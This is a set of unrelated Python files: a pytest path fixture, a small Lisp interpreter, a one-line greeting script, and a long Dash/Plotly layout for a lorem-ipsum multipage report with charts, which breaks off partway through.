# -*- coding: utf-8 -*-
import os
import pytest
@pytest.fixture(scope='session')
def absolute_path():
"""Fixture to create full path relative to `contest.py` inside tests."""
def factory(*files):
dirname = os.path.dirname(__file__)
return os.path.join(dirname, *files)
return factory
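# Illustrative usage (hypothetical test; assumes a data/sample.txt file
# exists next to this conftest.py):
#
# def test_absolute_path(absolute_path):
#     path = absolute_path('data', 'sample.txt')
#     assert os.path.isabs(path)
#     assert path.endswith(os.path.join('data', 'sample.txt'))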
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ------------------------------------------------------------
# liuyang, mtime: 2012-11-29 15:01:39
# A simple Lisp interpreter implemented in Python.
# Reference: http://www.googies.info/articles/lispy.html
# Python's features make this interpreter easy to write in very little
# code, yet small as it is, it has all the essential parts.
# It implements the full pipeline from input through parsing,
# environments, and evaluation, which helps a lot in understanding
# compilation and language design.
# ------------------------------------------------------------
# ------------------------ define ENVIRONMENT -----------------
class Env(dict):
" An envirionment: a dict of {'var':val} pairs,with an outer Env"
def __init__(self,params=(),args=(),outer=None):
self.update(zip(params,args))
self.outer=outer
def find(self,var):
"Find the innermost Env where var appears"
        # look up the correct environment according to lexical scoping
return self if var in self else self.outer.find(var)
def add_globals(env):
"add some Scheme standard procedures to an environment"
import math,operator as op
env.update(vars(math)) # add sin,sqrt,...
env.update({
'+' : op.add,
'-' : op.sub,
'*' : op.mul,
        '/' : op.truediv,
'not' : op.not_,
'>' : op.gt,
'<' : op.lt,
'>=' : op.ge,
'<=' : op.le,
'=' : op.eq,
'equal?' : op.eq,
'eq?' : op.is_,
'length' : len,
'cons' : lambda x,y : [x]+y,
'car' : lambda x : x[0],
'cdr' : lambda x : x[1 : ],
'append' : op.add,
'list' : lambda *x : list(x),
'list?' : lambda x : isa(x,list),
'null?' : lambda x : x==[],
'symbol?' : lambda x : isa(x,Symbol)
})
return env
g_env=add_globals(Env())
# ----------------- define EVAL -----------------------------
def eval(x,env=g_env):
    "Evaluate an expression in an environment"
if isa(x,Symbol): # variable reference
return env.find(x)[x]
elif not isa(x,list): # constant literal
return x
elif x[0]=='quote': # (quote exp)
(_,exp)=x
return exp
    elif x[0]=='if':            # (if test conseq alt)
(_,test,conseq,alt)=x
return eval((conseq if eval(test,env) else alt),env)
elif x[0]=='set!': # (set! var exp)
        (_,var,exp)=x
env.find(var)[var]=eval(exp,env)
elif x[0]=='define': # (define var exp)
(_,var,exp)=x
env[var]=eval(exp,env)
elif x[0]=='lambda': # (lambda (var*) exp)
(_,vars,exp)=x
return lambda *args: eval(exp,Env(vars,args,env))
elif x[0]=='begin': # (begin exp*)
for exp in x[1:]:
val = eval(exp,env)
return val
else: # (proc exp*)
exps = [eval(exp,env) for exp in x]
proc = exps.pop(0)
return proc(*exps)
isa = isinstance
Symbol = str
# ---------------------- Parsing Module ----------------------
def atom(token):
"numbers become numbers,every other token is a symbol"
try:
return int(token)
except ValueError:
try:
return float(token)
except ValueError:
return Symbol(token)
def read_from(tokens):
"read an expression from a sequence of tokens"
if len(tokens)==0:
raise SyntaxError("unexpected EOF while reading")
token=tokens.pop(0)
if '('==token:
L=[]
        # keep reading sub-expressions until the matching ')' is reached
        while tokens[0]!=')':
            L.append(read_from(tokens))
        tokens.pop(0) # pop off ')'
return L
elif ')'==token:
raise SyntaxError('unexpected ")"')
else:
return atom(token)
def tokenize(s):
"Convert a string into a list of tokens"
return s.replace('(',' ( ').replace(')',' ) ').split()
def read(s):
"Read a Scheme expression from a string"
return read_from(tokenize(s))
parse=read
# ---------------------- string func -----------------------
def to_string(exp):
"convert a Python object back in to a lisp-readable string"
return '('+' '.join(map(to_string,exp))+')' if isa(exp,list) else str(exp)
def repl(prompt='lis.py>> '):
"a prompt read-eval-print loop"
while True:
        val = eval(parse(input(prompt)))
        if val is not None:
            print(to_string(val))
# -------------------- main ----------------------------------
def test():
    assert eval(parse('(+ 1 2)')) == 3
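    # A few extra illustrative checks (not in the original; they exercise
    # define, lambda, and if through the same parse/eval pipeline):
    eval(parse('(define square (lambda (x) (* x x)))'))
    assert eval(parse('(square 4)')) == 16
    assert eval(parse('(if (> 2 1) (quote yes) (quote no))')) == 'yes'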
if __name__=="__main__":
repl()
|
a = "Hello"
c = "!!! 🙋♂️ "
b = " Rayne"
print(a + b + c)
|
# -*- coding: utf-8 -*-
import dash
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objs as go
import dash_table
import pandas as pd
import lorem
import pathlib
# Path
BASE_PATH = pathlib.Path(__file__).parent.resolve()
DATA_PATH = BASE_PATH.joinpath("Data").resolve()
# Read in data
supplyDemand = pd.read_csv(DATA_PATH.joinpath("supplyDemand.csv"))
actualSeasonal = pd.read_csv(DATA_PATH.joinpath("actualSeasonal.csv"))
industrailProd = pd.read_csv(DATA_PATH.joinpath("industrailProd.csv"))
globalMarket = pd.read_csv(DATA_PATH.joinpath("globalMarket.csv"))
oecdCommersial = pd.read_csv(DATA_PATH.joinpath("oecdCommersial.csv"))
wtiPrices = pd.read_csv(DATA_PATH.joinpath("wtiPrices.csv"))
epxEquity = pd.read_csv(DATA_PATH.joinpath("epxEquity.csv"))
chinaSpr = pd.read_csv(DATA_PATH.joinpath("chinaSpr.csv"))
oecdIndustry = pd.read_csv(DATA_PATH.joinpath("oecdIndustry.csv"))
wtiOilprices = pd.read_csv(DATA_PATH.joinpath("wtiOilprices.csv"))
productionCost = pd.read_csv(DATA_PATH.joinpath("productionCost.csv"))
production2015 = pd.read_csv(DATA_PATH.joinpath("production2015.csv"))
energyShare = pd.read_csv(DATA_PATH.joinpath("energyShare.csv"))
adjustedSales = pd.read_csv(DATA_PATH.joinpath("adjustedSales.csv"))
growthGdp = pd.read_csv(DATA_PATH.joinpath("growthGdp.csv"))
# Colours
color_1 = "#003399"
color_2 = "#00ffff"
color_3 = "#002277"
color_b = "#F8F8FF"
app = dash.Dash(__name__)
app.title = "Multipage Report"
server = app.server
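# The layout is one flat list of page Divs: each top-level html.Div with
# className="page" is a printable page of the report, and its "subpage"
# wrapper holds that page's text blocks, tables, and dcc.Graph figures.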
app.layout = html.Div(
children=[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
html.Img(
src=app.get_asset_url(
"dash-logo-new.png"
),
className="page-1a",
)
),
html.Div(
[
html.H6("Suscipit nibh"),
html.H5("LOREM IPSUM DOLOR"),
html.H6("Blandit pretium dui"),
],
className="page-1b",
),
],
className="page-1c",
)
],
className="page-1d",
),
html.Div(
[
html.H1(
[
html.Span("03", className="page-1e"),
html.Span("19"),
]
),
html.H6("Suscipit nibh vita"),
],
className="page-1f",
),
],
className="page-1g",
),
html.Div(
[
html.Div(
[
html.H6("Felecia Conroy", className="page-1h"),
html.P("453-264-8591"),
html.P("ilq@w.ipq"),
],
className="page-1i",
),
html.Div(
[
html.H6("Olin Dach", className="page-1h"),
html.P("497-234-2837r"),
html.P("isw@vxogiqyds.umf"),
],
className="page-1i",
),
html.Div(
[
html.H6(
"Dominique Durgan", className="page-1h"
),
html.P("913-823-9541"),
html.P("rgd@hp.xji"),
],
className="page-1i",
),
html.Div(
[
html.H6("Abraham Lemke", className="page-1h"),
html.P("248-865-2687"),
html.P("mc@a.kur"),
],
className="page-1i",
),
html.Div(
[
html.H6("Abraham Lemke", className="page-1h"),
html.P("284-671-3721"),
html.P("j@jdvwnqucm.etv"),
],
className="page-1i",
),
],
className="page-1j",
),
html.Div(
[
html.Div(
[
html.H6(
"Viverra, imperdiet, praesent pellentesque",
className="page-1h",
),
html.P(lorem.paragraph() * 2),
],
className="page-1k",
),
html.Div(
[
html.H6(
"Facilisis mauris parturient, eget vitae",
className="page-1h",
),
html.P(lorem.paragraph() * 2),
],
className="page-1l",
),
html.Div(
[
html.H6(
"A suspendisse mauris aliquam tincidunt hac",
className="page-1h",
),
html.P(lorem.paragraph() * 2),
],
className="page-1m",
),
html.Div(
[
html.H6(
"A elementum lorem dolor aliquam nisi diam",
className="page-1h",
),
html.P(lorem.paragraph()),
],
className="page-1l",
),
],
className="page-1n",
),
],
className="subpage",
)
],
className="page",
),
# Page 2
html.Div(
[
html.Div(
[
html.Div([html.H1("LOREM IPSUM")], className="page-2a"),
html.Div(
[
html.P(lorem.paragraph() * 3, className="page-2b"),
html.P(lorem.paragraph() * 2, className="page-2c"),
html.P(lorem.paragraph() * 2, className="page-2c"),
],
className="page-3",
),
html.Div(
[
html.P(lorem.paragraph() * 2, className="page-2b"),
html.P(lorem.paragraph() * 3, className="page-2c"),
],
className="page-3",
),
],
className="subpage",
)
],
className="page",
),
# Page 3
html.Div(
[
html.Div(
[
html.Div([html.H1("LOREM IPSUM")], className="page-3a"),
html.Div(
[
html.Div(
[
html.Div(
[
html.H6(
"Mauris feugiat quis lobortis nisl sed",
className="page-3b",
),
html.P(
lorem.paragraph(),
className="page-3c",
),
]
),
html.Div(
[
html.Div(
[
html.P(
lorem.paragraph() * 2,
className="page-3d",
)
],
className="page-3e",
),
html.Div(
[
html.P(
lorem.paragraph() * 2,
className="page-3d",
)
],
className="page-3f",
),
html.Div(
[
html.P(
lorem.paragraph(),
className="page-3d",
)
],
className="page-3g",
),
],
className="page-3i",
),
html.Div(
[
html.P(
lorem.paragraph(),
className="page-2c",
)
]
),
],
className="page-3j",
)
]
),
],
className="subpage",
)
],
className="page",
),
# Page 4
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"Ultricies fusce vel, ad ultricies enim, at, egestas",
className="page-3h",
),
html.P(
"Quis mauris dolor amet cubilia mattis, finibus magnis lacus",
className="page-3k",
),
],
className="title six columns",
),
html.Div(
[
html.Strong(
"Feugiat justo, aliquam feugiat justo suspendisse leo blandit",
className="page-3h",
),
html.P(
"Praesent, morbi, rhoncus habitant at maximus mauris",
className="page-3k",
),
],
className="title six columns",
),
],
className="thirdPage first row",
)
],
className="page-3l",
),
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=supplyDemand[
"Demand, x"
],
y=supplyDemand[
"Demand, y"
],
hoverinfo="y",
line={
"color": color_1,
"width": 1.5,
},
name="Demand",
),
go.Scatter(
x=supplyDemand[
"Supply, x; Trace 2, x"
],
y=supplyDemand[
"Supply, y; Trace 2, y"
],
hoverinfo="y",
line={
"color": color_2,
"width": 1.5,
},
name="Supply",
),
],
"layout": go.Layout(
height=250,
xaxis={
"range": [
1988,
2015,
],
"showgrid": False,
"showticklabels": True,
"tickangle": -90,
"tickcolor": "#b0b1b2",
"tickfont": {
"family": "Arial",
"size": 9,
},
"tickmode": "linear",
"tickprefix": "1Q",
"ticks": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "#FFFFFF",
},
yaxis={
"autorange": False,
"linecolor": "#b0b1b2",
"nticks": 9,
"range": [
-3000,
5000,
],
"showgrid": False,
"showline": True,
"tickcolor": "#b0b1b2",
"tickfont": {
"family": "Arial",
"size": 9,
},
"ticks": "outside",
"ticksuffix": " ",
"type": "linear",
"zerolinecolor": "#b0b1b2",
},
margin={
"r": 10,
"t": 5,
"b": 0,
"l": 40,
"pad": 2,
},
hovermode="closest",
legend={
"x": 0.5,
"y": -0.4,
"font": {
"size": 9
},
"orientation": "h",
"xanchor": "center",
"yanchor": "bottom",
},
),
}
)
],
className="page-3m",
)
],
className="six columns",
),
html.Div(
[
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=actualSeasonal[
"Actual, x; Crude ex. US SPR, x; Main Products, x"
],
y=actualSeasonal[
"Actual, y"
],
hoverinfo="y",
line={
"color": "#e41f23",
"width": 2,
},
marker={
"maxdisplayed": 0,
"opacity": 0,
},
name="Actual",
),
go.Scatter(
x=actualSeasonal[
"Seasonal*, x"
],
y=actualSeasonal[
"Seasonal*, y"
],
hoverinfo="y",
line={
"color": color_3,
"dash": "dot",
"width": 1.5,
},
mode="lines",
name="Seasonal*",
),
go.Bar(
x=actualSeasonal[
"Actual, x; Crude ex. US SPR, x; Main Products, x"
],
y=actualSeasonal[
"Crude ex. US SPR, y"
],
marker={
"color": color_2
},
name="Crude ex. US SPR",
),
go.Bar(
x=actualSeasonal[
"Actual, x; Crude ex. US SPR, x; Main Products, x"
],
y=actualSeasonal[
"Main Products, y"
],
marker={
"color": color_1
},
name="Main Products",
),
],
"layout": go.Layout(
barmode="relative",
dragmode="pan",
height=250,
width=310,
hovermode="closest",
legend={
"x": 0.06413301662707839,
"y": -0.05555227415846632,
"bgcolor": "rgba(255, 255, 255, 0)",
"borderwidth": 0,
"font": {
"size": 9
},
"orientation": "h",
"traceorder": "reversed",
},
margin={
"r": 10,
"t": 5,
"b": 0,
"l": 40,
"pad": 2,
},
showlegend=True,
titlefont={
"size": 16
},
xaxis={
"autorange": True,
"range": [
0.5,
8.5,
],
"showgrid": False,
"showline": False,
"tickcolor": "#b0b1b2",
"tickfont": {
"family": "Arial",
"size": 9,
},
"tickmode": "array",
"ticks": "",
"ticktext": [
"Jan-15",
"Feb-15",
"Mar-15",
"Apr-15",
"May-15",
"Jun-15",
"Jul-15",
"Aug-15",
],
"tickvals": [
1,
2,
3,
4,
5,
6,
7,
8,
],
"titlefont": {
"size": 8
},
"type": "linear",
"zeroline": True,
"zerolinecolor": "#FFFFFF",
},
xaxis2={
"autorange": False,
"fixedrange": True,
"overlaying": "x",
"position": 0.38,
"range": [
0.5,
8.5,
],
"showgrid": False,
"showticklabels": False,
"ticks": "",
"ticktext": [
"Jan-15",
"Feb-15",
"Mar-15",
"Apr-15",
"May-15",
"Jun-15",
"Jul-15",
"Aug-15",
],
"tickvals": [
1,
2,
3,
4,
5,
6,
7,
8,
],
},
yaxis={
"autorange": False,
"linecolor": "#b0b1b2",
"nticks": 8,
"range": [
-20,
50,
],
"showgrid": False,
"showline": False,
"tickcolor": "#b0b1b2",
"tickfont": {
"family": "Arial",
"size": 9,
},
"ticks": "outside",
},
),
}
)
],
className="two columns",
)
],
className="page-3m",
),
],
className="thirdPage row",
)
],
className="page-7",
),
html.Div(
[
html.P("Bibendum tellus phasellus turpis sapien:"),
html.P(
lorem.paragraph() * 2,
style={
"border-left": "5px",
"border-left-style": "solid",
"padding": "30px",
"border-left-color": color_1,
"padding-left": "20px",
"border-left-width": "7px",
"background-color": color_b,
},
),
],
style={
"float": "left",
"margin-top": "20px",
"margin-left": "30px",
},
className="eleven columns",
),
html.Div(
[
html.Div(
[
html.Strong(
"Ultricies fusce vel, ad ultricies enim, at, egestas",
style={
"color": color_1,
"padding-top": "100px",
},
),
html.P(
"Quis mauris dolor amet cubilia mattis, finibus magnis lacus",
className="page-3k",
),
],
className="title six columns",
),
html.Div(
[
html.Strong(
"Feugiat justo, aliquam feugiat justo suspendisse leo blandit",
className="page-3h",
),
html.P(
"Praesent, morbi, rhoncus habitant at maximus mauris",
className="page-3k",
),
],
className="title six columns",
),
],
className="thirdPage first row",
style={
"position": "relative",
"top": "20px",
"margin-left": "30px",
},
),
html.Div(
[
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=industrailProd[
"Industrial Production, x"
],
y=industrailProd[
"Industrial Production, y"
],
line={"color": color_2},
mode="lines",
name="Industrial Production",
visible=True,
),
go.Scatter(
x=industrailProd[
"Price (rhs), x"
],
y=industrailProd[
"Price (rhs), y"
],
line={"color": color_1},
mode="lines",
name="Price (rhs)",
visible=True,
yaxis="y2",
),
],
"layout": go.Layout(
annotations=[
{
"x": 0.95,
"y": -0.15,
"arrowhead": 7,
"ax": 0,
"ay": -40,
"font": {"size": 8},
"showarrow": False,
"text": "months after shock",
"xref": "paper",
"yref": "paper",
}
],
autosize=True,
dragmode="pan",
height=250,
width=300,
hovermode="closest",
legend={
"x": 0.0,
"y": 1.2,
"bgcolor": "rgb(255, 255, 255, 0)",
"font": {"size": 9},
},
margin={
"r": 40,
"t": 5,
"b": 10,
"l": 20,
"pad": 0,
},
paper_bgcolor="rgb(0, 0, 0, 0)",
plot_bgcolor="rgb(0, 0, 0, 0)",
showlegend=True,
xaxis={
"autorange": False,
"nticks": 19,
"range": [0.5, 18],
"showgrid": False,
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"ticks": "",
"type": "linear",
"zeroline": False,
},
yaxis={
"autorange": False,
"linecolor": "rgb(190, 191, 192)",
"mirror": True,
"nticks": 9,
"range": [-0.4, 1.2],
"showgrid": False,
"showline": True,
"side": "left",
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"ticks": "outside",
"ticksuffix": " ",
"type": "linear",
"zeroline": False,
},
yaxis2={
"anchor": "x",
"autorange": False,
"exponentformat": "e",
"linecolor": "rgb(190, 191, 192)",
"nticks": 9,
"overlaying": "y",
"range": [-0.1, 0.3],
"showgrid": False,
"side": "right",
"tickfont": {"size": 9},
"tickprefix": " ",
"ticks": "outside",
"type": "linear",
"zerolinecolor": "rgb(190, 191, 192)",
},
),
}
)
],
className="six columns",
style={"height": "250px"},
),
html.Div(
[
html.Div(
[
dash_table.DataTable(
data=growthGdp.to_dict("records"),
columns=[
{"id": c, "name": c}
for c in growthGdp.columns
],
style_data_conditional=[
{
"if": {"row_index": "odd"},
"backgroundColor": color_b,
},
{
"if": {"column_id": ""},
"backgroundColor": color_2,
"color": "white",
},
],
style_header={
"backgroundColor": color_1,
"fontWeight": "bold",
"color": "white",
},
fixed_rows={"headers": True},
style_cell={"width": "70px"},
)
],
className="exhibit six columns",
)
],
className="page-2c",
),
],
className="page-7",
),
],
className="subpage",
)
],
className="page",
),
# Page 5
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[html.P(lorem.paragraph())],
className="page-5",
),
html.Div(
[html.P(lorem.paragraph())],
className="page-5a",
),
html.Div(
[html.P(lorem.paragraph())],
className="page-5b",
),
],
className="page-5c",
)
],
className="eleven columns row",
),
html.Div(
[html.P(lorem.paragraph(), className="page-5f")],
className="twelve columns row",
),
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"Ultricies fusce vel, ad ultricies enim, at, egestas",
className="page-3h",
),
html.P(
"Quis mauris dolor amet cubilia mattis, finibus magnis lacus",
className="page-3k",
),
],
className="title six columns",
),
html.Div(
[
html.Strong(
"Feugiat justo, aliquam feugiat justo suspendisse leo blandit",
className="page-3h",
),
html.P(
"Praesent, morbi, rhoncus habitant at maximus mauris",
className="page-3k",
),
],
className="title six columns",
),
],
className="thirdPage first row",
)
],
className="page-5g",
),
html.Div(
[
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Bar(
x=globalMarket["x"],
y=globalMarket["y"],
marker={"color": color_1},
name="Global market imbalance",
)
],
"layout": go.Layout(
autosize=True,
bargap=0.63,
dragmode="pan",
height=250,
width=320,
hovermode="closest",
legend={
"x": 0.0006061953460797935,
"y": -0.31665440684852813,
"bgcolor": "rgb(255, 255, 255, 0)",
"borderwidth": 0,
"font": {"size": 9},
"orientation": "h",
},
margin={
"r": 40,
"t": 5,
"b": 10,
"l": 20,
"pad": 0,
},
showlegend=True,
title="Click to enter Plot title",
xaxis={
"autorange": False,
"nticks": 18,
"range": [-0.5, 15.5],
"showgrid": False,
"tickfont": {"size": 9},
"tickmode": "linear",
"ticks": "",
"title": "Click to enter X axis title",
"type": "category",
},
yaxis={
"autorange": True,
"linecolor": "rgb(176, 177, 178)",
"nticks": 10,
"range": [
-1283.8982436029166,
3012.5614936594166,
],
"showgrid": False,
"showline": True,
"tickfont": {"size": 9},
"ticks": "outside",
"title": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "rgb(176, 177, 178)",
},
),
}
)
],
className="six columns",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=oecdCommersial[
"OECD commercial ex. US NGL & other, x"
],
y=oecdCommersial[
"OECD commercial ex. US NGL & other, y"
],
line={"color": color_1},
mode="lines",
name="OECD commercial ex. US NGL & other",
),
go.Scatter(
x=oecdCommersial[
"Seasonal (2000-2014), x"
],
y=oecdCommersial[
"Seasonal (2000-2014), y"
],
line={"color": color_2},
mode="lines",
name="Seasonal (2000-2014)",
),
],
"layout": go.Layout(
autosize=True,
bargap=0.63,
dragmode="pan",
height=250,
width=320,
hovermode="closest",
legend={
"x": 0.0006061953460797935,
"y": -0.31665440684852813,
"bgcolor": "rgb(255, 255, 255, 0)",
"borderwidth": 0,
"font": {"size": 9},
"orientation": "h",
},
margin={
"r": 40,
"t": 5,
"b": 10,
"l": 40,
"pad": 0,
},
showlegend=True,
title="Click to enter Plot title",
xaxis={
"autorange": False,
"linecolor": "rgb(190, 191, 192)",
"nticks": 17,
"range": [-0.5, 16],
"showgrid": False,
"showline": False,
"tickfont": {"size": 9},
"ticks": "",
"ticksuffix": " ",
"title": "",
"type": "category",
"zeroline": False,
"zerolinecolor": "rgb(190, 191, 192)",
},
yaxis={
"autorange": False,
"linecolor": "rgb(190, 191, 192)",
"nticks": 10,
"range": [-800, 1000],
"showgrid": False,
"showline": True,
"tickfont": {"size": 10},
"ticks": "outside",
"ticksuffix": " ",
"title": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "rgb(190, 191, 192)",
},
),
}
)
],
className="six columns",
),
],
className="page-1i",
),
],
className="subpage",
)
],
className="page",
),
# Page 6
html.Div(
[
html.Div(
[
html.Div([html.P(lorem.paragraph() * 3)], className="page-6"),
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"At velit pharetra ac fusce sit dictum pellentesque",
className="eleven columns",
)
],
className="page-3h",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=wtiPrices[
"WTI Prices, x"
],
y=wtiPrices[
"WTI Prices, y"
],
line={
"color": color_1,
"dash": "solid",
},
mode="lines",
name="WTI Prices",
),
go.Scatter(
x=wtiPrices[
"Sep-15 forecast, x"
],
y=wtiPrices[
"Sep-15 forecast, y"
],
line={
"color": "rgb(228, 31, 35)"
},
mode="lines",
name="Sep-15 forecast",
),
go.Scatter(
x=wtiPrices[
"Forward, x"
],
y=wtiPrices[
"Forward, y"
],
line={
"color": color_2,
"dash": "solid",
},
mode="lines",
name="Forward",
),
go.Scatter(
x=wtiPrices[
"May-15 forecast, x"
],
y=wtiPrices[
"May-15 forecast, y"
],
line={
"color": color_3,
"dash": "solid",
},
mode="lines",
name="Forward",
),
],
"layout": go.Layout(
height=250,
hovermode="closest",
legend={
"x": 0.16039179104479998,
"y": 1,
"bgcolor": "rgb(255, 255, 255, 0)",
"bordercolor": "rgba(68, 68, 68, 0)",
"font": {
"color": "rgb(68, 68, 68)",
"size": 10,
},
"orientation": "h",
"traceorder": "normal",
},
margin={
"r": 40,
"t": 5,
"b": 30,
"l": 40,
},
showlegend=True,
xaxis={
"autorange": False,
"linecolor": "rgb(130, 132, 134)",
"mirror": False,
"nticks": 14,
"range": [0, 14],
"showgrid": False,
"showline": True,
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"ticks": "outside",
"ticktext": [
"Sep-14",
"Nov-14",
"Jan-15",
"Mar-15",
"May-15",
"Jul-15",
"Sep-15",
"Nov-15",
"Jan-16",
"Mar-16",
"May-16",
"Jul-16",
"Sept-16",
"Nov-16",
],
"tickvals": [
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
],
"title": "",
"type": "linear",
"zeroline": False,
"zerolinecolor": "rgb(130, 132, 134)",
},
yaxis={
"autorange": False,
"linecolor": "rgb(130, 132, 134)",
"nticks": 8,
"range": [30, 100],
"showline": True,
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 10,
},
"ticks": "outside",
"ticksuffix": " ",
"title": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "rgb(130, 132, 134)",
},
),
}
)
]
),
],
className="eleven columns",
)
],
className="page-2c",
),
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"At velit pharetra ac fusce sit dictum pellentesque",
className="page-3h",
),
html.P(
lorem.paragraph() * 3,
className="page-2c",
),
],
className="page-6a",
)
],
className="five columns",
),
html.Div(
[
html.Div(
[
html.Strong(
"Vehicula elementum congue penatibus massa, eu sed",
className="page-6d",
),
html.Div(
html.Img(
src=app.get_asset_url(
"DBkxRT2.png"
),
className="page-6b",
)
),
],
className="page-6c",
)
],
className="six columns",
),
],
className="thirdPage row",
)
],
className="page-6e",
),
],
className="subpage",
)
],
className="page",
),
# Page 7
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.P(
lorem.paragraph() * 3, className="page-7a"
),
html.P(
lorem.paragraph() * 2, className="page-7a"
),
html.P(lorem.paragraph(), className="page-7a"),
html.P(lorem.paragraph(), className="page-7a"),
],
className="page-7b",
)
],
className="six columns",
),
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"Vehicula elementum congue penatibus massa, eu sed sed dolor",
className="page-3h",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Bar(
x=[
"AAA",
"AA",
"A",
"BBB",
"BB",
"B",
"CCC",
],
y=[
"1497",
"976",
"1016",
"1739",
"993",
"545",
"31",
],
marker={
"color": color_1
},
name="y",
)
],
"layout": go.Layout(
height=300,
hovermode="closest",
autosize=True,
bargap=0.75,
legend={
"x": 0.16039179104479998,
"y": -0.2720578174979476,
"bgcolor": "rgb(255, 255, 255, 0)",
"bordercolor": "rgba(68, 68, 68, 0)",
"font": {
"color": "rgb(68, 68, 68)",
"size": 10,
},
"orientation": "h",
"traceorder": "normal",
},
margin={
"r": 0,
"t": 10,
"b": 30,
"l": 60,
},
xaxis={
"autorange": False,
"nticks": 10,
"range": [
-0.5,
6.5,
],
"tickfont": {
"size": 9
},
"ticks": "",
"title": "",
"type": "category",
},
yaxis={
"autorange": False,
"dtick": 250,
"nticks": 9,
"range": [
0,
2250,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"ticksuffix": " ",
"title": "2015E production by rating (mboe)<br><br>",
"titlefont": {
"size": 9
},
"type": "linear",
"zeroline": True,
},
),
}
)
]
),
],
className="page-7c",
),
html.Div(
[
html.Strong(
"At velit pharetra ac fusce sit dictum pellentesque, dictumst",
className="page-3h",
),
html.Div(
dcc.Graph(
figure={
"data": [
go.Scatter(
x=epxEquity[
"EPX equity sector, x"
],
y=epxEquity[
"EPX equity sector, y"
],
line={
"color": color_1,
"width": 2,
},
mode="lines",
name="EPX equity sector",
visible=True,
),
go.Scatter(
x=epxEquity[
"WTI 2-yr swap, x"
],
y=epxEquity[
"WTI 2-yr swap, y"
],
line={
"color": color_2,
"width": 2,
},
mode="lines",
name="WTI 2-yr swap",
visible=True,
),
go.Scatter(
x=epxEquity[
"HY energy spread ratio (rhs, inverted), x"
],
y=epxEquity[
"HY energy spread ratio (rhs, inverted), y"
],
line={
"color": "red",
"width": 2,
},
mode="lines",
name="HY energy spread ratio (rhs, inverted)",
visible=True,
),
],
"layout": go.Layout(
height=300,
autosize=True,
hovermode="closest",
legend={
"x": 0.008033242860512229,
"y": -0.3007047167087806,
"bgcolor": "rgba(255, 255, 255, 0)",
"font": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"orientation": "h",
},
margin={
"r": 30,
"t": 10,
"b": 20,
"l": 30,
},
showlegend=True,
xaxis={
"autorange": False,
"linecolor": "rgb(130, 132, 134)",
"linewidth": 1,
"nticks": 14,
"range": [0, 12],
"showgrid": False,
"showline": True,
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"ticks": "outside",
"ticktext": [
"Sep-14",
"Oct-14",
"Nov-14",
"Dec-14",
"Jan-15",
"Feb-15",
"Mar-15",
"Apr-15",
"May-15",
"Jun-15",
"July-15",
"Aug-15",
],
"tickvals": [
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
],
"title": "",
"type": "linear",
"zeroline": False,
},
yaxis={
"autorange": False,
"linecolor": "rgb(130, 132, 134)",
"nticks": 8,
"range": [30, 100],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"title": "",
"type": "linear",
"zeroline": True,
},
yaxis2={
"anchor": "x",
"linecolor": "rgb(130, 132, 134)",
"nticks": 10,
"overlaying": "y",
"range": [1.8, 0.9],
"showgrid": False,
"showline": True,
"side": "right",
"tickfont": {
"size": 9
},
"ticks": "outside",
"title": "Click to enter Y axis title",
"type": "linear",
"zeroline": False,
},
),
}
)
),
],
className="page-1i",
),
],
className="twelve columns",
)
],
className="page-7d",
),
],
className="subpage",
)
],
className="page",
),
# Page 8
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.H6(
"Aliquet ut mauris nostra habitant egestas, massa vulputate. Magnis nullam leo eget ullamcorper lacus congue laoreet ex sed",
className="page-3b",
),
html.P(
lorem.paragraph(),
className="page-3c",
),
html.P(
lorem.paragraph(),
className="page-8a",
),
]
),
html.Div(
[
html.Div(
[
html.P(
lorem.paragraph()
* 2,
className="page-3d",
)
],
className="page-3e",
),
html.Div(
[
html.P(
lorem.paragraph()
* 2,
className="page-3d",
)
],
className="page-3f",
),
html.Div(
[
html.P(
lorem.paragraph()
* 2,
className="page-3d",
)
],
className="page-3g",
),
],
className="page-3i",
),
html.Div(
[
html.P(
lorem.paragraph(),
className="page-2c",
)
]
),
],
className="nine columns",
)
],
className="page-8b",
)
],
className="subpage",
)
],
className="page-8c",
)
],
className="page",
),
# Page 9
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.P(
"Aenean felis et libero nullam pretium quis est in sit. Commodo nec ante aenean a. Commodo at facilisis vestibulum cursus elementum nascetur et, placerat class aliquam convallis porttitor accumsan. Ultricies sed laoreet eleifend maximus venenatis",
className="page-3h",
),
html.Strong(
"Congue nisl iaculis interdum cubilia maximus"
